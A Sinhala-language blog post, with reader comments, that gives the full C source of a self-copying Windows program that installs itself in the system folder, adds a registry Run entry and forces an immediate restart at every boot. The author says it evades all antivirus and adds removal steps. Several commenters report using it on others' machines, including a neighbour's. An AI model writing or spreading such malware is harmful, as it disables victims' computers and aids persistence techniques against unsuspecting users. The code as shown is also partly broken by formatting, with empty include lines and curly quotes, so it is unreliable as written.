twitter rss

කොම්පියුටරේ Auto-restart කරන්න වයිරස් එකක් හදන්න ඉගෙනගමු.

තේරීම
අද මම පෙන්නන්න යන්නෙ පොඩි වයිරස් එකක් හදන විදිය. හැබැයි මේක කියල දෙන්න ඉස්සෙල්ලාම කියන්න තියෙන්නෙ, මේක අනිත් අයට හරදරයක් වෙන විදියට කරන්න එපා කියලයි. මේකෙ තියන තාක්ෂණික පැත්ත ඉගෙන ගන්න. හරි, වයිරස් එකෙන් කෙරෙන්නෙ මේකයි, පරිගණකය බූට් කරන හැම වාරයක් පාසාම පරිගණකය රී-ස්ටාර්ට් වෙනවා. මේකෙ තියන හොඳම දේ කියන්නෙ මේ වැඩසටහන දැනට තියන කිසිම ඇන්ටි-වයිරස් මෘදුකාන්ගයකට හසු නොවීමයි. මම මේක කෝඩින් කරල තියෙන්නෙ C වලින්. ඉතින් C වලට ටිකක් හුරු අයට මේක අල්ල ගන්න ලේසියි. නමුත් අනිත් අයටත් අවුලක් වෙන්නෙ නෑ. ප්‍රශ්න ආවොත් අහන්න.

  • මෙන්න මේකටි කෝඩින් එක.

#include
#include

#include

int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk;
//File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC);
//to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0);
//to determine whether the virus is already installed or not
if(done==0)
{
found=1;
//means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0)
//if the system is not already infected
{
self=fopen(_argv[0],”rb”);
//The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”);
//to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”);
//put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″);
//if the system is already infected then just give a command to restart
}

  • "Turbo C compiler" වගේ compiler එකක් මගින් මේක .exe file එකක් බවට පරිවර්තනය කරගන්න.
  • හරි, දැන් බලමු මේක හරියට ක්‍රයත්මක වෙනවද කියල බලන්නෙ කොහොමද කියල! අපි මුලින් compile කර ගන හදා ගත්ත sysres.exe file, එක double click කරන්න. වැඩේ හරියට කෙරුවනම්, මෙතැන් පටන් අපි පරිගණකය බූට් කරන හැම වාරයක් පාසාම පරිගණකය රී-බූට් වෙනව.
  • දැන් අපි බලමු, මේ වයිරස් එක පරිගණකයෙන් ඉවත් කරන්නෙ කොහොමද කියලා.
1. මුලින්ම පරිගණකය බූට් වෙනකොට Safe Mood එකෙන් බූට කරන්න.
2. X:\Windows\System (X can be C,D,E or F). කියන ෆොල්ඩරය හොයා ගන්න.
3. ෆොල්ඩරය ඇතුලෙ තියන sysres.exe කියන ෆයිල් එක හොයාගෙන ඒක ඩ්ලීට් (delete) කරල දාන්න.
4. Run menu (win key + R) එකට ගිහිල regedit කියල ටය්ප් කරන්න.
5. HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run විදියට navigate කරන්න.
6. දකුනු පැත්තෙ තියන "sres" කියන entry එක ඩිලීට් කරන්න.
----*----- ඔන්න දැන් වයිරස් එක සහමුලින්ම අයින් කරල දැම්මා ----*-----
  • හරි, දැන් මම කියල දෙන්නම් මේ ක්‍රියාවලියෙ පසුපස තියන නියාය මොකක්ද කියලා !
  1. මුලින්ම අපි exe file එක run කෙරුවාම වයිරස් එක පරිගණකය බූට් වෙන windows Root partition එක හොයා ගන්නව.
  2. ඊටපස්සෙ ඒක determine කරනව වයිරස් එක X:\Windows\System කියන ෆොල්ඩර් එකට කොපි වෙලාද කියල!
  3. කොපි වෙලා නැත්තන් එයා කොපි කරගෙන රෙජිස්ට්‍රි (registry entry) එකක් හදා ගන්නව මේක startup එකේදි පන ගැන්වෙන විදියට.
  4. නැත්තන් X:\Windows\System ඩිරෙක්ටරියෙ වයිරස් එක කොපි වෙල තියනවනම්. එය රී-බූට් වෙන්න කමාන්ඩ් එකක් දෙනවා. මේ ක්‍රියාවලිය නොකඩව සිදුවෙනව.
  • මේක බලන අයට නැවතත් කරුනාවෙන් කියන්නෙ. තමන්ගෙ පරිගණකයෙ අත්හදා බැලුවට, අනිත් අයට ගේමක් දෙන්ඩ හිතාගෙනනම් කරන්න එපා. අනිත් එක, registry key ගැන හරි අවබෝදයක් නැත්තම් මේක අත්හදාබැලීමෙන් වැලකී සිටීම නුවනට හුරුයි. නැත්තන් මට එන්න වෙයි මේක අයින් කරල දෙන්න.
-----*---- අපහැදිලි තැනක් තියනවනම් අහන්න. -----*----

  • ඔෆිස් එකේ වැඩ ඔක්කොම පැත්තකින් දාල මේක ටයිප් කරල ඇගිලිත් රිදෙනව.

---- ** -- ඉදිරියේදි වයිරස් එකකින් USB එකක් අක්ක්‍රය කරන්නෙ කොහොමද කියල කියල දෙන්නම්. ---- ** --

  1. මීට වඩා හොඳ නැද්ද වයිරස් වලින් බේරෙන ක්‍රම ටිකක් ලිව්වනං? :-O

  1. එල ගින්දර වගේ වැඩ කරනවා.දෙන්නම් හොඳ වැඩක් අල්ලපු ගෙදර එකාට !

  1. මේක notepad එකේද save කරන්න ඕනෙ! ~x(

  1. bravo....bravo....
    code eka poddak modify karala wena mokak hari karanna balanna one. awulak nehene. thankX for da tip. thawa me wage articles liyanna.

  1. pariganaka aparada walata den thada daduwam...parissamin..oya andala welapila keewata meka balan un bageta bagayak oka tharaha karayange pc walata daayi...ara keewath wage kisima virus ekak run nowenna program ekak liyahanko...meti weda nokara

  1. රොකියා මේක ලියපු එක හොදා...
    ඒත් අවුල වඳුරො අතට දැලි පිහිය ගියෝතින්.

    කල්පනාවෙන් දැනුම බෙදමු.

    ජය වේවා...

  1. @Lankapartner,
    සහතික ඇත්ත. ඒක තමයි මම මුලින් කියන්න උත්සාහ කළේ. මේ පෝස්ට් එකට නම් මම විරෝධතාව පළ කරනවා පුතෝ! x(

    සිංහල බ්ලොග් ලියන තවත් අය ඉන්නවා ඔය වගේ ගේම් දෙන්න පුළුවන් සහ දීලා තියෙන අය.

  1. ස්ටාර්ටප් එකේ shutdown.exe call කරොත්?

  1. අහ්.Shok :D වෙඩක්. But හොදයි කියන්නමත් බැහැ. මොකද මේක හදල Com ගෙන හරි අවබොදයක් නැති කෙනෙක්ගෙ Com එකකට මොකෙක් හරි අලුගුත්තෙරුවෙක් මේක දෙම්මොත් අර අසරනයගෙ සaපය ඔබ තුමාටත් වදි. නමුත් මේ වගෙ දෙයක් දැන ගෙන ඉන්න එකක් හොදයි. බැරිද අපිට මේක පොඩ්ඩක් Modify කරන්න වැඩි හානියක් නොවෙන විදිහට මෙන්න මෙ වගෙ. Com එක ඔන් වෙද්දි මොකහරි Massage එකක් එන්න බයකරන්න පුලුවන් විදිහෙ මෙන්න මේ වගෙ"අඩෝ වැල මාටියා තොගෙ කෙරුවාවල් මම බලාගෙන ඉන්නෙ" වගෙ මොකක් හරි Comedy යක් දාන්න . :D

    geethge.blogspot.com

  1. උදේ පාන්දරම pc 2 ගේම දුන්න.thanks මචං කරපු උදව්වට.තව තියනවනම් ‍දෙන්න

  1. හරි ඔන්න එහෙනම් කට්ටියගෙ බලවත් විරෝදය මත, මම වයිරස් ගැන ලියන පොස්ට් ඔක්කොම නවතා දැමන ලදී.

  1. Nawaththanna epa ....lankawata set wena virus guard ekak hadanna...Like
    'AchcharuAntiVirus'
    awurudu kaleta hodata wikineyi...:))

  1. මට නම් මේ ලිපිය හුගක් වැදගත්,පුලුවන් නම් තව ලියන්න .ලිපියෙ කියනතරම් අවදානමක් මම නම් දකින්නෙ නැහැ.

  1. අයියේ මේ ඔයා ලියන එකේ කිසිම වැරැද්දක් මට පේනනෑ
    මොකද අපි මේව ගැන දැනුවත් උනාම අපිට මේ වගේ දෙයක් කවුරු හරි කරන්න හැදුවොත් අපිට මීටර් වෙනව
    කවුරු මොනවගේ කතා කිවුවත් ඔයා ලියන්න මම නම් කැමතියි ඕවට ලියනවනේ???

  1. හොඳයි..ඒත් වැරදි කෙනෙක් අතට ගියොත් අවුල් නේ?

Post a Comment

ලිපිය බැලුවනම් අනිවා කමෙන්ට් එකෙක් තියලා යන්න !

Related Posts with Thumbnails

Unicode Decoder

විස්තරේ

Bloggers’ Rights at EFF

License

License
This work is licensed